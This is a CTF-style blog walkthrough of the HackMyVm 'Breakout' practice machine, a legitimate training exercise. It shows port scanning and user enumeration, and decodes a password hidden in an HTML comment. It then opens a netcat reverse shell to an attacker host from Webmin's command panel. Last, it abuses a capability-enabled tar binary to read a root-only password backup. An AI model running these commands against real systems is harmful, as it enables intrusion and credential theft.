Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Breakout Walkthrough

HackMyVm Breakout Walkthrough

Key points: good enum

https://hackmyvm.eu/machines/machine.php?vm=Breakout


Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.33.145  -oN ports.log    
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.                              
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST                                                              
 Nmap scan report for 192.168.33.145                            
 Host is up (0.0022s latency).                                  
 Not shown: 65530 closed ports                                  
 PORT      STATE SERVICE     VERSION                            
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)                  
 |_http-title: Apache2 Debian Default Page: It works            
 139/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 445/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)                                                                    
 |_http-title: 200 — Document follows                    
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:                                          
 |_clock-skew: 7h59m58s                                        
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:                                          
 |   2.02:                                                      
 |_    Message signing enabled but not required                
 | smb2-time:                                                  
 |   date: 2021-10-22T22:03:10                                  
 |_  start_date: N/A                                            


Check source code of index.html at port 80.

 <!--
 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
 
 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
 
 
 -->


It's brainfuck code. Decode it online, get string ".2uqPEfj3D<P'a-3".

Use enum4linux to enum.

 ~ enum4linux 192.168.33.145 | tee enum.log
 ...
 S-1-22-1-1000 Unix User\cyber (Local User)
 


With username cyber and password we decode from brainfuck code, we can login at port 20000.

In control panel, we found command shell.

image-20211022224903817.png


Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.

 ~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.145.
 Ncat: Connection from 192.168.33.145:35206.
 id
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 cyber@breakout:~$


Search cap.

 cyber@breakout:/$ getcap / -r 2>/dev/null
 getcap / -r 2>/dev/null
 /home/cyber/tar cap_dac_read_search=ep
 /usr/bin/ping cap_net_raw=ep


And we found password backup.

 cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak


We can compress it can extract it in /tmp folder using /home/cyber/tar.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 /var/backups/
 /var/backups/.old_pass.bak
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 var/backups/
 var/backups/.old_pass.bak
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak
 Ts&4&YurgtRX(=~h


Finally we get root.

 root@breakout:~# id;hostname
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 breakout




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1